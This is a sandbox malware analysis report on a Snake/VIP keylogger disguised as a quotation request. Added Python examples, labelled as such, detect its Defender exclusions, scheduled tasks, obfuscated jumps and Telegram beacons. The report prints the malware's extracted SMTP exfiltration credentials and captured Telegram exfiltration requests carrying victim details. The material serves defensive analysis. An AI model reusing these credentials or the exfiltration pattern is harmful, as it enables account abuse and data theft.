Windows Analysis Report
Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Overview

General Information

Sample name: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Analysis ID: 1559184
MD5: 7b5985233faf11890e9cf4c7b579983b
SHA1: cb2f20ad79ea7d8a1758ac2ae90a1c6d7f47e784
SHA256: 5cce0ced936e5d9c13d6a4a8a3c149371c92236eb4c465e0e422142946509cea
Tags: exe user-xzx

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match
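Three of the Sigma and Defender-related signatures above describe command-line patterns: a PowerShell -EncodedCommand whose decoded body calls Add-MpPreference or Set-MpPreference with an exclusion, a plain-text Defender exclusion, and schtasks.exe creating a task from a file under a temp or profile directory. The Python below is an added example, not part of this Joe Sandbox report or of the sample's code, that triages process-creation events for those three patterns. The events, paths and task name are constructed for illustration; the report excerpt above does not show the actual command lines.

```python
import base64
import re

# Constructed process-creation events (not taken from the report) shaped like the
# command lines the Sigma rules above describe. Paths and task names are illustrative.
SAMPLE_EVENTS = [
    {   # PowerShell with a base64 (UTF-16LE) -EncodedCommand adding a Defender exclusion
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell.exe -EncodedCommand " + base64.b64encode(
            'Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Roaming"'.encode("utf-16-le")
        ).decode("ascii"),
    },
    {   # schtasks creating a task from an XML definition dropped in %TEMP%
        "image": r"C:\Windows\System32\schtasks.exe",
        "cmdline": r'schtasks.exe /Create /TN "Updates\example" /XML "C:\Users\user\AppData\Local\Temp\tmp1234.tmp"',
    },
    {   # benign: querying an existing task
        "image": r"C:\Windows\System32\schtasks.exe",
        "cmdline": r'schtasks.exe /Query /TN "Microsoft\Windows\Defrag\ScheduledDefrag"',
    },
    {   # benign: plain PowerShell command
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": 'powershell.exe -Command "Get-Date"',
    },
]

# Common spellings of the -EncodedCommand switch, followed by the base64 payload.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
MP_EXCLUSION = re.compile(r"\b(?:Add|Set)-MpPreference\b.*?-Exclusion(?:Path|Extension|Process)",
                          re.IGNORECASE | re.DOTALL)
TEMP_OR_PROFILE = re.compile(r"\\(?:AppData\\Local\\Temp|AppData\\Roaming|Temp)\\", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None when the flag is absent or malformed."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(event):
    """Return the rule names a single event trips (empty list for benign events)."""
    findings = []
    cmd = event["cmdline"]
    image = event["image"].lower()
    decoded = decode_encoded_command(cmd)
    if image.endswith("powershell.exe"):
        if decoded is not None and MP_EXCLUSION.search(decoded):
            findings.append("powershell_b64_encoded_mppreference")   # Base64 Encoded MpPreference Cmdlet
        elif MP_EXCLUSION.search(cmd):
            findings.append("powershell_defender_exclusion")        # Powershell Defender Exclusion
    if (image.endswith("schtasks.exe") and re.search(r"/create\b", cmd, re.IGNORECASE)
            and TEMP_OR_PROFILE.search(cmd)):
        findings.append("schtasks_create_from_temp")                 # Scheduled temp file as task from temp location
    return findings


def triage_all(events):
    """Map each event index to the rules it trips."""
    return {i: triage(e) for i, e in enumerate(events)}
```

Decoding the payload before matching is the point: the base64 form hides the cmdlet name from any rule that only inspects the raw command line, and the decoded text is what an analyst wants in the alert.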

Classification

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection

barindex
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Avira: detected
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Avira: detection malicious, Label: HEUR/AGEN.1306899
Source: 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "transportes@contfly.pt", "Password": "Transportes2022*", "Host": "mail.contfly.pt", "Port": "587", "Version": "4.4"}
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "transportes@contfly.pt", "Password": "Transportes2022*", "Host": "mail.contfly.pt", "Port": "587"}
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe ReversingLabs: Detection: 34%
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe ReversingLabs: Detection: 34%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Joe Sandbox ML: detected
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Joe Sandbox ML: detected

Location Tracking

barindex
Source: unknown DNS query: name: reallyfreegeoip.org
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49720 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49767 version: TLS 1.2
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 06C5B299h 0_2_06C5B736
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0125F45Dh 9_2_0125F2C0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0125F45Dh 9_2_0125F4AC
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0125FC19h 9_2_0125F961
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05979280h 9_2_05978FB0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05977EB5h 9_2_05977B78
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 059718A1h 9_2_059715F8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0597C826h 9_2_0597C558
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05970FF1h 9_2_05970D48
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0597E816h 9_2_0597E548
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05970741h 9_2_05970498
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05976733h 9_2_05976488
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0597BF06h 9_2_0597BC38
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0597DEF6h 9_2_0597DC28
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05973709h 9_2_05973460
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0597DA66h 9_2_0597D798
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05975A29h 9_2_05975780
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0597FA56h 9_2_0597F788
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0597BA76h 9_2_0597B7A8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 059779C9h 9_2_05977720
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05972A01h 9_2_05972758
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05972151h 9_2_05971EA8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05975179h 9_2_05974ED0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 059748C9h 9_2_05974620
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05977119h 9_2_05976E70
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0597D146h 9_2_0597CE78
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0597F136h 9_2_0597EE68
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05971449h 9_2_059711A0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0597ECA6h 9_2_0597E9D8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0597CCB6h 9_2_0597C9E8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then mov esp, ebp 9_2_0597B081
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0597E386h 9_2_0597E0B8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0597C396h 9_2_0597C0C8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05970B99h 9_2_059708F0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 059732B1h 9_2_05973008
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 059762D9h 9_2_05976030
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 059702E9h 9_2_05970040
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05972E59h 9_2_05972BB0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05975E81h 9_2_05975BD8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0597B5E6h 9_2_0597B318
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 059725A9h 9_2_05972300
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0597D5D6h 9_2_0597D308
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 059755D1h 9_2_05975328
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05977571h 9_2_059772C8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0597F5C6h 9_2_0597F2F8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05976CC1h 9_2_05976A18
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05971CF9h 9_2_05971A50
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05974D21h 9_2_05974A78
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 069AA4F9h 11_2_069AA996
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 0166F45Dh 14_2_0166F2C0
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 0166F45Dh 14_2_0166F52F
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 0166F45Dh 14_2_0166F4AC
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 0166FC19h 14_2_0166F961
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DB0D0Dh 14_2_06DB0B30
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DB1697h 14_2_06DB0B30
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DBFAB9h 14_2_06DBF810
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DB31E0h 14_2_06DB2DC8
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DB2C19h 14_2_06DB2968
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DBE959h 14_2_06DBE6B0
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DBE501h 14_2_06DBE258
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 14_2_06DB0673
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DBE0A9h 14_2_06DBDE00
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DBF661h 14_2_06DBF3B8
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DBF209h 14_2_06DBEF60
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DBEDB1h 14_2_06DBEB08
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DBD3A1h 14_2_06DBD0F8
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DBCF49h 14_2_06DBCCA0
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 14_2_06DB0853
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 14_2_06DB0040
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DB31E0h 14_2_06DB2DC3
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DBDC51h 14_2_06DBD9A8
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DBD7F9h 14_2_06DBD550
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DB31E0h 14_2_06DB310E
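Each entry above is a run of four nop bytes immediately followed by a jmp, which the report flags as a marker of shellcode or obfuscated code. The Python below is an added example, not part of the report or of the sample, that scans a 32-bit code buffer for that pattern and resolves each jump target the way the CPU does (relative to the end of the jmp instruction). The buffer is constructed: its base address and first jump target are chosen to reproduce the report's "4x nop then jmp 06C5B299h" entry, but the bytes are not taken from the sample.

```python
import struct

# Constructed 32-bit code buffer (not bytes from the sample). The base address and the
# first jmp target mirror the report's "4x nop then jmp 06C5B299h" entry.
BASE = 0x06C5B700
TARGET = 0x06C5B299


def build_sample():
    buf = bytearray(b"\x55\x8b\xec")        # push ebp; mov ebp, esp
    buf += b"\x90\x90\x33\xc0"              # a 2-nop run (below threshold) then xor eax, eax
    buf += b"\xcc" * (0x40 - len(buf))      # int3 padding up to offset 0x40
    end_of_jmp = BASE + 0x40 + 4 + 5        # address following the 4 nops and the 5-byte jmp rel32
    buf += b"\x90" * 4 + b"\xe9" + struct.pack("<i", TARGET - end_of_jmp)
    buf += b"\x90" * 4 + b"\xeb\x10"        # 4 nops then jmp short +0x10
    buf += b"\xc3"                          # ret
    return bytes(buf)


def find_nop_then_jmp(code, base, min_nops=4):
    """Return (address_of_nop_run, nop_count, jmp_target) for every run of >= min_nops
    0x90 bytes immediately followed by jmp rel32 (E9) or jmp rel8 (EB). The target is
    computed from the end of the jmp, as the CPU does, and wrapped to 32 bits."""
    hits = []
    i, n = 0, len(code)
    while i < n:
        if code[i] != 0x90:
            i += 1
            continue
        start = i
        while i < n and code[i] == 0x90:
            i += 1
        run = i - start
        if run < min_nops or i >= n:
            continue
        op = code[i]
        if op == 0xE9 and i + 5 <= n:
            rel = struct.unpack_from("<i", code, i + 1)[0]
            hits.append((base + start, run, (base + i + 5 + rel) & 0xFFFFFFFF))
            i += 5
        elif op == 0xEB and i + 2 <= n:
            rel = struct.unpack_from("<b", code, i + 1)[0]
            hits.append((base + start, run, (base + i + 2 + rel) & 0xFFFFFFFF))
            i += 2
    return hits


def describe(hits):
    """Render hits in the report's wording, e.g. '4x nop then jmp 06C5B299h @ 06C5B740'."""
    return ["%dx nop then jmp %08Xh @ %08X" % (run, tgt, addr) for addr, run, tgt in hits]
```

Running the scanner over a memory dump rather than the on-disk file is what makes it useful here: the report attributes these hits to unpacked regions (the 9_2_ and 14_2_ prefixes are process and dump indices), which is where a .NET loader's decoded native code lives.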

Networking

barindex
Source: unknown DNS query: name: api.telegram.org
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20and%20Time:%2020/11/2024%20/%2015:28:21%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20045012%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20and%20Time:%2020/11/2024%20/%2014:58:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20045012%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
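The request sequence above (checkip.dyndns.org, then reallyfreegeoip.org/xml/<ip>, then api.telegram.org /bot<token>/sendMessage carrying a URL-encoded status message) is the pattern behind the "Tries to detect the country of the analysis system" and "Uses the Telegram API" signatures. The Python below is an added example, not part of the report, that runs that correlation over a constructed proxy log and decodes the beacon body into fields. The log format and the non-Telegram lines are assumptions; the Telegram URL is the one captured above, with its empty bot token and chat_id kept as captured.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed proxy log (not from the report): "client method host path", one request per
# line. The Telegram request reuses the URL captured above; the other lines are made up.
SAMPLE_LOG = """\
192.168.2.5 GET checkip.dyndns.org /
192.168.2.5 GET reallyfreegeoip.org /xml/8.46.123.75
192.168.2.5 GET api.telegram.org /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20and%20Time:%2020/11/2024%20/%2015:28:21%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20045012%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
10.0.0.7 GET www.example.com /index.html
"""

IP_CHECK_HOSTS = {"checkip.dyndns.org", "reallyfreegeoip.org"}
BOT_PATH = re.compile(r"^/bot([^/]*)/sendMessage$")


def parse_line(line):
    client, method, host, path = line.split(" ", 3)
    return {"client": client, "method": method, "host": host, "path": path}


def decode_telegram_beacon(path):
    """For /bot<token>/sendMessage return token, chat_id and the URL-decoded text, else None."""
    parts = urlsplit(path)
    m = BOT_PATH.match(parts.path)
    if not m:
        return None
    q = parse_qs(parts.query, keep_blank_values=True)
    return {"token": m.group(1),
            "chat_id": q.get("chat_id", [""])[0],
            "text": q.get("text", [""])[0]}


def beacon_fields(text):
    """Split the CRLF-separated 'Key: value' lines of the beacon body into a dict;
    lines without a colon (blank lines, the bracketed note) are ignored."""
    fields = {}
    for line in text.split("\r\n"):
        if ":" in line:
            key, value = line.split(":", 1)
            fields[key.strip()] = value.strip()
    return fields


def triage_log(log_text):
    """Per client: remember any public-IP lookup, then decode every Telegram sendMessage call."""
    state = {}
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ev = parse_line(raw)
        st = state.setdefault(ev["client"], {"ip_check": False, "beacons": []})
        if ev["host"] in IP_CHECK_HOSTS:
            st["ip_check"] = True
        elif ev["host"] == "api.telegram.org":
            beacon = decode_telegram_beacon(ev["path"])
            if beacon:
                st["beacons"].append(beacon)
    alerts = []
    for client, st in state.items():
        for b in st["beacons"]:
            alerts.append({"client": client,
                           "preceded_by_ip_check": st["ip_check"],
                           "token_present": bool(b["token"]),
                           "chat_id": b["chat_id"],
                           "fields": beacon_fields(b["text"])})
    return alerts
```

On the captured URL the token and chat_id are both empty, so token_present comes back False; when a real token is present, the decoded token is the indicator to report, since it identifies the attacker's bot to the Telegram API.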
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49712 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49708 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49717 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49724 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49727 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49734 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49722 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49760 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49735 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49745 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49710 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49740 -> 188.114.96.3:443
